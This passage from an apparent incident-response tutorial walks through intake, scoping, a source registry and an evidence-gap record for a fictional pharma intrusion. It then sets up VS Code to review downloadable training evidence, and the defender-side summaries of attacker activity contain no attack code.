discovery<br><br>**3.1 When do you believe the activity started?**<br>- [ ] Known<br>- [x] Estimated: activity on WS-CFO-01 started approximately 18:42 IST (PowerShell<br>  launch timestamp from CrowdStrike event).<br><br>**3.2 How long do you estimate the activity has been occurring?**<br>Approximately 13 minutes from first PowerShell event to escalation call (18:42–18:55 IST).<br>However: unknown whether this is the beginning of the intrusion or a later stage.<br><br>**3.3 Is there a specific event that triggered the alert or complaint?**<br>CrowdStrike behavioral IOA fired at 18:42:33 IST on WS-CFO-01. Tier 1 escalated<br>at 18:47. IR Lead paged at 18:52. Intake call started at 18:55.<br><br>---<br><br>## 4. What has already been done?<br><br>**4.1 Has any system been rebooted, shut down, or reimaged since the activity was discovered?**<br>- [x] No — WS-CFO-01 is still running. Not yet isolated.<br><br>**4.2 Have any credentials, tokens, or API keys been rotated or revoked?**<br>- [x] No — no credential changes made yet.<br><br>**4.3 Has any network access been blocked or firewall rules been changed?**<br>- [x] No — 203.0.113.87 has not been blocked. Ran confirmed: "We wanted to check<br>  with you first before blocking — didn't want to tip them off."<br><br>**4.4 Has any malware been deleted or quarantined?**<br>- [x] No — CrowdStrike flagged the process but did not quarantine. Alert status: Detected,<br>  not Prevented (policy is set to Detect-only on this machine — CFO exception policy).<br><br>**4.5 Has anyone notified external parties?**<br>- [x] No — no external notification yet. INCD assessment pending scope confirmation.<br><br>---<br><br>## 5. Systems and access<br><br>**5.1 What logging is expected to exist for the affected systems?**<br>- Endpoint logs (Sysmon, CrowdStrike): [x] Yes — CrowdStrike on WS-CFO-01. Sysmon on<br>  WS-CFO-01. NOTE: Sysmon NOT deployed on server-class machines or DC01.<br>- VPN / authentication logs: [x] Yes — Cisco AnyConnect VPN, logs in Splunk.<br>- Database audit logs: [x] Yes — SQL audit on SERVER-RD-02 (partial EIDs only).<br>- Network flow / firewall logs: [x] Yes — Palo Alto NGFW. RETENTION: 14 days only.<br>  ⚠ SERVER-RD-02 outbound logs will expire 2024-11-29 for today's traffic.<br>- Email gateway logs: [x] Yes — M365 Message Trace, 30-day retention. ATP enabled.<br>  NOTE: ATP sandbox NOT enabled for xlsm files — policy gap identified.<br>- Cloud provider logs: [x] Yes — Azure AD sign-in logs, 30-day retention.<br><br>**5.2 What tools and access does the analyst have?**<br>- [x] Admin access to affected hosts (CrowdStrike RTR for WS-CFO-01, WS-CFO-01 CrowdStrike console)<br>- [x] Read access to SIEM (Splunk — full org)<br>- [x] Access to EDR console (CrowdStrike Falcon — full org view)<br>- [x] Access to network equipment / firewall logs (Palo Alto Panorama — read only)<br>- [x] Access to cloud console (Azure AD — Security Reader role)<br>- [x] Access to email gateway (M365 Security &amp; Compliance — Message Trace)<br>- [ ] VPN / jump host credentials — not yet, request submitted<br>- [x] TheHive / OpenCTI lab access<br><br>**5.3 Are there any systems the analyst should NOT touch?**<br>⚠ WS-IT-LEVI (Paz Levi, IT Admin): LEGAL HOLD issued at 20:45 IST today.<br>  HR investigation underway — UNRELATED to this incident (employment matter).<br>  Hardware access BLOCKED for 48–72 hours per Legal counsel (Adv. Dina Shapiro).<br>  Remote CrowdStrike RTR is PERMITTED — confirmed by Legal.<br>  No memory image, no disk image, no physical access until hold lifted.<br><br>---<br><br>## 6. Business impact<br><br>**6.1 What business processes are affected or at risk?**<br>"The CFO's email and workstation are involved. If this is a full compromise, finance<br>data is at risk. We also have R&amp;D server SERVER-RD-02 — it holds the formula files<br>for the US licensing deal. That deal closes in 6 weeks. If those files were touched,<br>we have an FDA NDA issue and a $52M deal at risk."<br><br>**6.2 Is customer data, employee data, or regulated data potentially involved?**<br>- [x] Yes — type: proprietary formula files under FDA NDA filing (USPartner2024 package,<br>  47 files, ~380 MB). Also: employee financial data on SERVER-FIN-01 if CFO path<br>  extended to finance server.<br><br>**6.3 What is the financial exposure if this is confirmed?**<br>Direct deal risk: $52M US licensing agreement. Regulatory exposure: Israeli Privacy<br>Protection Law (PPL) fines + FDA NDA breach penalties. Reputational exposure: US<br>partner disclosure obligation if formula data confirmed exfiltrated.<br><br>**6.4 Is there a hard deadline driving this investigation?**<br>- [x] Yes — deadline: INCD 72-hour notification window starts from discovery of<br>  breach (not discovery of alert). If formula data or critical infrastructure<br>  involvement confirmed: clock starts NOW → expires 2024-11-17 ~18:47 IST.<br><br>---<br><br>## 7. Regulatory and legal constraints<br><br>**7.1 Are there applicable notification requirements?**<br><br>| Regulation | Applicable? | Deadline | Notified? |<br>|---|---|---|---|<br>| INCD (Israeli critical infrastructure) | TBD — assess after scope confirmed | 72h from discovery | No |<br>| Biometric Database Authority | No — no biometric data at LifeTech | — | N/A |<br>| BoI-CD 362 (Israeli financial) | No — LifeTech is not a financial entity | — | N/A |<br>| GDPR | TBD — EU customers in export data? | 72h from awareness | No |<br>| PCI-DSS | No — no card processing at LifeTech | — | N/A |<br>| Israeli Privacy Protection Law | Yes — employee + partner data in scope | Per PPL — notify DPA if breach confirmed | No |<br>| FDA / NDA obligation | Yes — if formula files confirmed exfiltrated | Immediate notification to US partner | No |<br><br>**7.2 Is there an active legal hold on any systems or data?**<br>- [x] Yes — WS-IT-LEVI (Paz Levi). Legal hold issued 2024-11-15 20:45 IST.<br>  Contact: Adv. Dina Shapiro (Legal). Hold expected: 48–72 hours minimum.<br><br>**7.3 Has legal counsel been notified?**<br>- [x] Yes — Adv. Dina Shapiro notified of the security incident at 19:10 IST.<br>  Advised: do not touch WS-IT-LEVI hardware. RTR permitted with logging.<br><br>---<br><br>## 8. Analyst notes<br><br>(Raw notes taken during call — unprocessed)<br><br>- Ran (SOC): "The CFO is still at the office. We haven't told her yet. Should we?"<br>  → IR Lead decision: do not inform CFO until after memory dump. Risk: she might<br>  reboot the machine.<br>- The CrowdStrike policy on WS-CFO-01 is DETECT-ONLY (CFO exception policy).<br>  This is why the process was not killed automatically. SOC should evaluate<br>  moving to Prevent for exec machines after this incident.<br>- 203.0.113.87 — not blocklisted anywhere in org. Ran says: "It's clean on our<br>  end, never seen it before." Worth enriching immediately (VirusTotal, Shodan).<br>- Memory dump of WS-CFO-01 is urgent — C2 is still active. Process may have<br>  network artifact or decrypted payload in memory. Action: RTR memory dump NOW.<br>- No mention of SERVER-RD-02 during this call — IR Lead is not aware of the<br>  formula file risk yet. Will scope that separately after evidence inventory.<br>- p.levi (WS-IT-LEVI) is under HR investigation for unrelated reason. Legal hold<br>  is coincidental. However: IT admin access + legal hold + security incident<br>  creates a complex situation. Document carefully.<br><br>---<br><br>## 9. Next actions<br><br>| # | Action | Owner | Due |<br>|---|---|---|---|<br>| 1 | Take memory dump of WS-CFO-01 via CrowdStrike RTR before C2 session ends | Yael (CTI) | Immediate |<br>| 2 | Enrich 203.0.113.87 — VirusTotal, Shodan, passive DNS, ASN lookup | Yael (CTI) | Within 30 min |<br>| 3 | Pull M365 Message Trace for m.cohen last 48h — identify delivery vector | Omer (Tier 1) | Within 30 min |<br>| 4 | Retrieve Palo Alto firewall logs for WS-CFO-01 and SERVER-RD-02 — full available window | Ran (SOC) | Within 1h ⚠ retention risk |<br>| 5 | Check Azure AD sign-in logs for m.cohen and p.levi — last 30 days | Yael (CTI) | Within 1h |<br>| 6 | Confirm SERVER-RD-02 USPartner2024 directory access — pull EID 4663 from Splunk | Yael (CTI) | Within 2h |<br>| 7 | Open TheHive case PROJ-2024-001, attach this intake as first observable | Yael (CTI) | Within 30 min |<br>| 8 | Advise IR Lead on INCD 72h clock — confirm if formula data scope triggers mandatory notification | Noa (IR Lead) + Legal | Within 2h |<br><br>---<br><br>*Intake completed 2024-11-15 19:18 IST. File saved as 00-scope/intake-2024-11-15.md.*<br>*Case opened in TheHive: PROJ-2024-001.*<br>```<br><br>Two items in this intake change the entire investigation trajectory: the legal hold on `WS-IT-LEVI` (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.<br><br>The intake commits to git first:</pre><p>Two items in this intake change the entire investigation trajectory: the legal hold on WS-IT-LEVI (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.</p><p>The intake commits to git first:</p><pre>git add 00-scope/intake-2024-11-15.md<br>git commit -m "PROJ-001: intake — CFO PowerShell alert, legal hold on WS-IT-LEVI, formula data in scope"</pre><h3>Step 1–2: Project Setup and Scope</h3><p>The folder and git repo already exist from Step 00. This step fills the scope document and gets stakeholder sign-off before any analysis begins. The rule: <strong>you do not start looking at logs until the scope is committed.</strong></p><h4>1. Open the scope document</h4><pre>nano 00-scope/scope.md</pre><pre># Intelligence Source Registry<br><br>**Project:** PROJ-2024-001 — LifeTech Pharma Targeted Intrusion<br><br>Admiralty Scale: Source reliability A (completely reliable) – F (reliability cannot be judged).  <br>Information reliability: 1 (confirmed) – 6 (truth cannot be judged).<br><br>---<br><br>## Internal Sources<br><br>| ID | Source | Type | Admiralty | Notes |<br>|---|---|---|---|---|<br>| INT-001 | Splunk SIEM | Log aggregation | A/2 | Primary forensic source; full org scope; read-only access. Initial 1h Splunk query by Tier 1 (Omer Cohen) — covered WS-CFO-01 only. |<br>| INT-002 | CrowdStrike Falcon | EDR / endpoint telemetry | A/2 | Deployed on WS-CFO-01, WS-IT-LEVI. NOT deployed on R&amp;D server fleet (12 servers) or DC01. CFO machine on Detect-only policy (not Prevent). |<br>| INT-003 | Palo Alto NGFW (Panorama) | Firewall flows / NetFlow | A/2 | Read-only. 14-day retention. ⚠ SERVER-RD-02 Nov 6 outbound flows expire 2024-11-20 — retrieve before any other task. |<br>| INT-004 | M365 Message Trace | Email gateway logs | A/2 | 30-day retention. ATP sandbox NOT enabled for .xlsm files — phishing attachment delivered uninspected. |<br>| INT-005 | Azure AD sign-in logs | Cloud authentication | A/2 | 30-day retention. Security Reader role. Covers m.cohen and p.levi sign-in history. |<br>| INT-006 | Sysmon (WS-CFO-01, WS-IT-LEVI) | Endpoint process/network telemetry | A/2 | NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). |<br>| INT-007 | Windows Security event logs (DC01, SERVER-RD-02) | Authentication / authorization | A/2 | DC01: partial export only — full log inaccessible. EID 4662 (DCSync) and EID 4663 (object access) relevant. |<br>| INT-008 | SQL audit — SERVER-RD-02 | Database object-access audit | A/2 | Partial EIDs only; not all object-access events captured. Required for PIR-001 (formula file access). |<br>| INT-009 | Cisco AnyConnect VPN | VPN session logs | A/2 | Available in Splunk. Covers p.levi sessions (AiTM hypothesis). |<br><br>---<br><br>## External / OSINT Sources<br><br>| ID | Source | Type | Admiralty | TLP | Notes |<br>|---|---|---|---|---|---|<br>| EXT-001 | CERT-IL | Government advisory | A/2 | TLP:AMBER | Check for active advisories targeting Israeli pharma sector. |<br>| EXT-002 | VirusTotal | IOC enrichment | C/3 | TLP:WHITE | Immediate priority: 203.0.113.87 hash/IP lookup. Crowdsourced — treat as corroborating only. |<br>| EXT-003 | Shodan | Infrastructure recon | C/3 | TLP:WHITE | 203.0.113.87 ASN / infrastructure / open-port lookup. |<br>| EXT-004 | URLScan.io | Domain analysis | C/3 | TLP:WHITE | Passive DNS and domain history for C2 domains identified in flows. |<br>| EXT-005 | MISP | Community threat intel | B/3 | TLP:AMBER | Pharma sector sharing. Cross-reference IOCs against community feed. |<br><br>---<br><br>## Source Limitations<br><br>| Source | Known Limitation |<br>|---|---|<br>| Palo Alto NGFW (INT-003) | 14-day retention only. SERVER-RD-02 Nov 6 outbound flows expire **2024-11-20** — retrieve immediately, before any other analysis. |<br>| CrowdStrike Falcon (INT-002) | Not deployed on R&amp;D server fleet (12 servers) or DC01. No EDR telemetry for those hosts — Windows Security events and NGFW logs are the only visibility. |<br>| Sysmon (INT-006) | Not deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). Process creation and network telemetry unavailable for those hosts. |<br>| Windows Security / DC01 (INT-007) | Only partial event log export available; full log is inaccessible. Analytical confidence on DC01 activity is reduced. |<br>| M365 ATP (INT-004) | Sandbox not enabled for .xlsm attachments. The suspected phishing attachment was delivered without detonation — no ATP verdict available. |<br>| SQL audit — SERVER-RD-02 (INT-008) | Partial EIDs only. Not all object-access events are captured. Absence of a log entry does NOT confirm file was not accessed. |<br>| WS-IT-LEVI — all sources | Legal hold issued 2024-11-15 20:45 IST (Adv. Dina Shapiro). No hardware, disk, or memory image permitted. CrowdStrike RTR allowed with full session logging. Re-assess after hold lifted (est. 48–72h). |<br>| Azure AD sign-in logs (INT-005) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. |<br>| M365 Message Trace (INT-004) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. |<br>| VirusTotal (EXT-002) | Crowdsourced; vendor detections may be absent for fresh infrastructure. A clean VT result does not rule out malicious use. Treat as corroborating, not authoritative. |</pre><p>The template has six sections. Fill each one now:</p><p><strong>Header — fill the four metadata lines at the top:</strong></p><pre>Project: PROJ-2024-001<br>Classification: TLP:AMBER<br>Date scoped: 2024-11-15<br>Scoped by: [your name]<br>Approved by: Noa Ben-David, IR Lead</pre><p><strong>Incident Summary — one paragraph, what triggered this:</strong></p><pre>CrowdStrike behavioral detection on WS-CFO-01 at 18:42 IST, November 15, 2024.<br>PowerShell spawned by OUTLOOK.EXE with base64-encoded payload, downloading from<br>203.0.113.87. Scope of compromise unknown. Formula files on SERVER-RD-02 are<br>potentially in scope — US licensing deal ($52M) requires regulatory assessment.</pre><p><strong>In Scope — fill the asset table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DCTpI5jIcRRkQ2YqjL8LgQ.png"></figure><p><strong>Out of Scope — fill the exclusion table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X9YT7xlqBXmn_mRAm67QwA.png"></figure><p><strong>PIRs — copy from project.yml, add due dates:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Fz8_y2Mq8glncIY5VHdEMA.png"></figure><p><strong>Constraints and Assumptions — fill the four fields:</strong></p><pre>Legal/regulatory: INCD 72h notification window expires 2024-11-17 18:47 IST.<br>  Israeli Privacy Protection Law + FDA NDA obligations if formula data confirmed.<br>Evidence limitations: Palo Alto firewall logs — 14-day retention.<br>  SERVER-RD-02 Nov 6 outbound logs expire 2024-11-20. Retrieve immediately.<br>  Sysmon absent from all server-class machines.<br>Access restrictions: WS-IT-LEVI — legal hold, no hardware access. RTR permitted.<br>Assumptions: All timestamps assumed UTC unless marked IST. Not converted in log excerpts.</pre><p><strong>Definition of Done — check the boxes your team has agreed to:</strong></p><pre>- [ ] All PIRs answered or formally deferred with reasoning<br>- [ ] Timeline covers full attacker dwell period (or gap documented)<br>- [ ] ATT&amp;CK mapping reviewed and finalized<br>- [ ] At least one detection rule per confirmed TTP<br>- [ ] SOC handoff delivered and acknowledged<br>- [ ] Executive brief approved by Noa Ben-David (IR Lead)<br>- [ ] INCD notification filed if formula data confirmed</pre><p>Full scope.md:</p><pre># Scope Definition<br><br>**Project:** PROJ-2024-001<br>**Classification:** TLP:AMBER<br>**Date scoped:** 2024-11-15<br>**Scoped by:** Yael Mizrahi (CTI Analyst)<br>**Approved by:** Noa Ben-David (IR Lead) — verbal approval 19:22 IST<br><br>---<br><br>## Incident Summary<br><br>CrowdStrike behavioral IOA fired on WS-CFO-01 (Michal Cohen, CFO) at 18:42 IST on<br>2024-11-15. PowerShell with encoded payload launched from OUTLOOK.EXE; three outbound<br>C2 connections to 203.0.113.87 confirmed within 15 minutes of detection. Scope of<br>compromise is unknown at time of scoping — the CFO alert may be a late-stage indicator<br>of a broader intrusion. Formula files on SERVER-RD-02 (US licensing package, ~380 MB,<br>47 files) are in scope for PIR-001 due to financial and regulatory exposure ($52M deal,<br>FDA NDA obligations). INCD 72h notification clock assessed as active from time of<br>discovery.<br><br>---<br><br>## In Scope<br><br>| Asset / System | Owner | Justification |<br>|---|---|---|<br>| WS-CFO-01.lifetechpharma.local | IT Dept / Michal Cohen (CFO) | Triggering alert host — CrowdStrike IOA, active C2 |<br>| WS-IT-LEVI.lifetechpharma.local | IT Dept / Paz Levi (IT Admin) | Suspected initial access vector — AiTM phishing hypothesis |<br>| SERVER-RD-02.lifetechpharma.local | R&amp;D Dept | Formula file storage — PIR-001 primary asset |<br>| SERVER-FIN-01.lifetechpharma.local | Finance Dept | Lateral movement target — confirmed by CrowdStrike alert Nov 15 |<br>| DC01.lifetechpharma.local | IT Dept | DCSync event EID 4662 observed from non-DC IP |<br>| Exchange Online (M365) | IT / Microsoft | Email delivery vector — phishing investigation |<br>| Azure AD | IT / Microsoft | Authentication logs — VPN session token replay |<br>| Palo Alto NGFW (perimeter) | IT / Network team | C2 traffic confirmation, SERVER-RD-02 exfil flows |<br><br>---<br><br>## Out of Scope<br><br>| Asset / System | Reason for Exclusion |<br>|---|---|<br>| SharePoint Online / OneDrive | Cloud scope — no evidence of involvement; requires separate authorization |<br>| Manufacturing SCADA / OT network | No evidence of lateral movement into OT segment at this time |<br>| WS-IT-LEVI — hardware / disk image | Legal hold issued 2024-11-15 20:45 IST. No hardware access until hold lifted. RTR permitted. |<br>| All other endpoints (838 total) | Out of scope pending hunt results — may expand if pivot on C2 domains finds new hosts |<br><br>---<br><br>## Priority Intelligence Requirements (PIRs)<br><br>| ID | Question | Priority | Due | Status |<br>|---|---|---|---|---|<br>| PIR-001 | Was the US licensing formula package (`SERVER-RD-02\LicenseDeals\USPartner2024\`) accessed or exfiltrated? If so, what and when? | High | 2024-11-16 06:00 IST | Open |<br>| PIR-002 | How did the adversary gain initial access — phishing, credential theft, exploitation, or insider? | High | 2024-11-16 06:00 IST | Open |<br>| PIR-003 | Is there evidence of ongoing access or persistence as of 2024-11-15 19:00 IST? Are any other hosts compromised? | High | 2024-11-16 06:00 IST | Open |<br><br>---<br><br>## Constraints and Assumptions<br><br>- **Legal/regulatory:** INCD 72h notification window — expires approximately 2024-11-17<br>  18:47 IST. Israeli Privacy Protection Law (PPL) notification to DPA if personal data<br>  breach confirmed. FDA NDA obligation to notify US partner if formula files confirmed<br>  exfiltrated — no specific deadline but immediate notification is standard practice.<br>- **Evidence limitations:**<br>  - Palo Alto NGFW firewall flows: 14-day retention only. SERVER-RD-02 November 6<br>    outbound traffic expires 2024-11-20. **Retrieve before any other analysis.**<br>  - Sysmon NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01).<br>  - CrowdStrike NOT deployed on R&amp;D server fleet (12 servers) or DC01.<br>  - DC01 Windows Security log: only partial export available — full log inaccessible.<br>  - ATP sandbox not enabled for .xlsm files — attachment was delivered uninspected.<br>- **Access restrictions:**<br>  - WS-IT-LEVI: legal hold, no hardware/disk/memory access. CrowdStrike RTR permitted<br>    with full session logging. Contact Adv. Dina Shapiro before any exception.<br>  - VPN jump host credentials: requested, not yet provisioned (Yael Mizrahi, 19:05 IST).<br>- **Assumptions:**<br>  - All log timestamps assumed UTC unless explicitly marked IST in source.<br>  - CrowdStrike behavioral detections treated as CONFIRMED source (Admiralty A/2).<br>  - Sysmon EID events treated as CONFIRMED source where forwarder health is verified.<br><br>---<br><br>## Stakeholders<br><br>| Name | Role | Involvement |<br>|---|---|---|<br>| Noa Ben-David | IR Lead | Scope approval; receives executive brief; INCD notification decision |<br>| Ran Katz | SOC Manager | SOC handoff; implements detection rules; hunting queries |<br>| Adv. Dina Shapiro | Legal Counsel | Legal hold oversight; PPL / regulatory notifications; WS-IT-LEVI access decisions |<br>| [CISO name] | CISO | Executive brief recipient; $52M deal brief to Board |<br>| [US Partner contact] | External — US biopharma | FDA NDA notification if PIR-001 answered YES |<br><br>---<br><br>## Definition of Done<br><br>This investigation is complete when:<br><br>- [ ] All three PIRs answered or formally deferred with documented reasoning<br>- [ ] Timeline covers full attacker dwell period from first access to detection (or gap documented)<br>- [ ] ATT&amp;CK mapping completed and reviewed — all confirmed techniques have a gap type<br>- [ ] At least one Sigma detection rule per confirmed TTP with Rule Missing or Coverage Incomplete gap<br>- [ ] SOC handoff document delivered to Ran Katz and acknowledged<br>- [ ] Executive brief approved by Noa Ben-David (IR Lead)<br>- [ ] INCD notification filed if formula data or CII involvement confirmed (deadline: 2024-11-17 18:47 IST)<br>- [ ] PPL / FDA NDA notification decision documented (even if decision is: not required)<br>- [ ] project.yml status set to `closed` and all PIR statuses updated</pre><h4>2. Save the file and commit</h4><pre>git add 00-scope/scope.md<br>git commit -m "PROJ-2024-001: scope signed off — 5 systems, 3 PIRs, INCD deadline 2024-11-17, firewall log retrieval urgent"</pre><p><strong>The firewall log retention deadline drives everything.</strong> SERVER-RD-02’s November 6 outbound traffic expires November 20. That is the exfiltration confirmation window. If it closes, CL-003 becomes INFERRED, not CONFIRMED. Retrieve those logs before any other analysis.</p><h3>Step R1: Evidence Inventory — What Exists and What Is Missing</h3><p>The evidence inventory runs before analysis. The rule: <strong>you do not analyze what you have not inventoried.</strong></p><h4>1. Open the source registry</h4><pre>nano 02-sources/source-registry.md</pre><p>The template has two tables: Internal Sources and External Sources. Fill every row you have access to — and explicitly mark what is absent. Unknown coverage is not the same as no coverage.</p><h4>2. Fill in what you have</h4><p>For each log source, fill four fields: <strong>Source name</strong>, <strong>System(s) it covers</strong>, <strong>Admiralty reliability rating</strong>, and <strong>any known gap</strong>. Where a source is absent from a system that should have it, add a row with — absent in the Gap column. That absence is a finding.</p><p>For LifeTech, the completed source registry drives this inventory:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Mt6DCDNVu6YThxF6WCowcg.png"></figure><p><strong>GAP-001 — WS-IT-LEVI Sysmon: October 22 — November 1, 2024</strong></p><pre>Duration: 10 days<br>Root cause: Unknown — Sysmon forwarder stopped. Coincides exactly with<br>  the day the IT admin received a phishing email.<br>What is missing: process creation (EID 1), network connections (EID 3),<br>  file creation (EID 11) for this host during this entire window.<br>Impact: Cannot confirm or rule out attacker activity on WS-IT-LEVI<br>  between Oct 22 and Nov 1. All claims about this period are INFERRED<br>  or HYPOTHESIZED unless supported by alternative sources (VPN logs,<br>  DC authentication logs, firewall flows).<br>Possible cause: Deliberate anti-forensic technique — terminating Sysmon<br>  service is a known evasion method.</pre><p>The 10-day gap on the IT admin workstation starts the same day a phishing email was delivered to him. This is not coincidence — it is a finding.</p><h4>3. Create a GAP document for every gap</h4><p>Each gap gets its own file. Create it now:</p><pre>nano 01-evidence/GAP-001-ws-it-levi-sysmon.md</pre><p>Paste the filled template:</p><pre># GAP-001 — WS-IT-LEVI Sysmon | 2024-10-22 – 2024-11-01<br>Duration: 10 days (2024-10-22 11:31 UTC to 2024-11-01 09:14 UTC)<br>Root cause: Sysmon forwarder stopped. Coincides exactly with delivery<br>  of phishing email to p.levi at 11:23 UTC.<br>What is missing: EID 1 (process creation), EID 3 (network connections),<br>  EID 11 (file creation) for WS-IT-LEVI during this entire window.<br>Impact: Cannot confirm or rule out attacker activity during this period.<br>  All claims covering Oct 22–Nov 1 on this host are INFERRED or<br>  HYPOTHESIZED unless corroborated by VPN logs, DC auth logs, or<br>  firewall flows.<br>Possible cause: Deliberate - terminating Sysmon is T1562.001 (Impair<br>  Defenses). A gap coinciding with a malicious delivery is itself a<br>  finding, not merely an absence.</pre><h4>4. Commit the evidence inventory</h4><pre>git add 01-evidence/ 02-sources/source-registry.md<br>git commit -m "PROJ-2024-001: evidence inventory — 6 sources, GAP-001 (10-day Sysmon gap WS-IT-LEVI Oct 22–Nov 1), firewall log retrieval urgent before Nov 20"</pre><h3>Step R1.5: Hands-On Evidence Analysis — VS Code Investigation</h3><p>The evidence inventory tells you what exists. This step analyzes it. VS Code is the primary tool: one window holds the evidence tree, the formatted logs, the API calls, and the terminal — no context-switching between applications.</p><h4>Setup — Open the Evidence Folder</h4><pre># One command opens the entire evidence directory as a workspace<br>code ~/investigations/lifetech-2024-11/01-evidence/</pre><p>VS Code opens with the Explorer panel showing the full evidence tree. Every JSON, JSONL, CSV, and syslog file is one click away.</p><p><strong>Install four extensions before starting</strong> (Ctrl+Shift+X, search by ID):</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LyER2G4y2xTAF1kXY4MX6A.png"></figure><p>Or install all at once from the integrated terminal (Ctrl+`` ):</p><pre>code --install-extension mechatroner.rainbow-csv<br>code --install-extension humao.rest-client<br>code --install-extension ms-vscode.hexeditor<br>code --install-extension esbenp.prettier-vscode</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/991/1*Pp_6YW13coi4GWZcb2a8Wg.png"></figure><p><strong>Key VS Code shortcuts used throughout this step:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2i3dAl46V_xX0cqntP0rCw.png"></figure><p><strong>Download the training evidence:</strong></p><pre>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>code ~/CTI_as_a_Code/investigations/lifetech-2024-11/01-evidence/</pre><p>Direct links to open any file in GitHub (also downloadable via curl -L):</p><ul><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/m365/message-trace-p.levi.csv">m365/message-trace-p.levi.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> IT admin phishing delivery, Oct 15–24</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/m365/message-trace-m.cohen.csv">m365/message-trace-m.cohen.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> CFO phishing delivery, Nov 13–15</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/azure-ad/signin-p.levi.json">azure-ad/signin-p.levi.json</a><br><strong>Format:</strong> JSON<br><strong>Contains:</strong> IT admin Azure AD sign-ins — Istanbul token replay</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/vpn/anyconnect-2024-10-24.log">vpn/anyconnect-2024-10-24.log</a><br><strong>Format:</strong> ASA syslog<br><strong>Contains:</strong> VPN session from Istanbul, Oct 24</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/sysmon/WS-CFO-01-sysmon.jsonl">sysmon/WS-CFO-01-sysmon.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> CFO workstation — PowerShell, LSASS, persistence, BITS</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/crowdstrike/WS-CFO-01-alert-20241115.json">crowdstrike/WS-CFO-01-alert-20241115.json</a><br><strong>Format:</strong> JSON<br><strong>Contains:</strong> CrowdStrike Falcon alert — triggering detection</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/windows-security/DC01-security.jsonl">windows-security/DC01-security.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> DC01 security events — DCSync EID 4662</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/windows-security/SERVER-RD-02-security.jsonl">windows-security/SERVER-RD-02-security.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> R&amp;D server — EID 4663 file access, EID 5156 exfil</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/palo-alto/ngfw-flows.csv">palo-alto/ngfw-flows.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> Perimeter firewall flows — 381 MB exfil confirmed</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/palo-alto/dns-queries.csv">palo-alto/dns-queries.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> DNS telemetry — C2 beacon pattern</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/sql-audit/SERVER-RD-02-sql-audit.jsonl">sql-audit/SERVER-RD-02-sql-audit.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> SQL Server audit — full xp_cmdshell exfil chain</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/GAP-001-ws-it-levi-sysmon.md">GAP-001-ws-it-levi-sysmon.md</a><br><strong>Format:</strong> Markdown<br><strong>Contains:</strong> Documented 10-day Sysmon gap on IT admin host</li></ul><h4>1. CrowdStrike Alert — JSON in VS Code</h4><p><strong>In VS Code Explorer:</strong> click crowdstrike/WS-CFO-01-alert-20241115.json</p><p>Press Shift+Alt+F to auto-format. The nested structure becomes readable with collapsible sections.</p><p><strong>Open the Outline panel</strong> (Ctrl+Shift+O):</p><pre>▶ meta<br>▼ resources<br>  ▼ [0]<br>    ▶ device        — hostname, OS, groups<br>    ▼ behaviors<br>      [0] Execution / T1059.001  — OUTLOOK.EXE → powershell.exe<br>      [1] Command and Control / T1071.001<br>      [2] Persistence / T1547.001<br>      [3] Credential Access / T1003.001<br>    ▶ network_accesses<br>    ▶ prevention_policy</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EHUHyPz18JBNmPFRWS5VHA.png"></figure><p>Click any node to jump directly to that section. Click prevention_policy — you see "prevent": false immediately. The CFO's machine is in detect-only mode; the C2 connection is live. <strong>Take the memory dump before anything else.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bsA6unjBprE5asg-jKFbug.png"></figure><p><strong>Search</strong> (Ctrl+F): type prevented → jumps to "prevent": false. Type cmdline → jumps to the encoded PowerShell command.</p><p><strong>Or use jq tool:</strong></p><p><strong>Extract key fields in the integrated terminal</strong> (Ctrl+`` 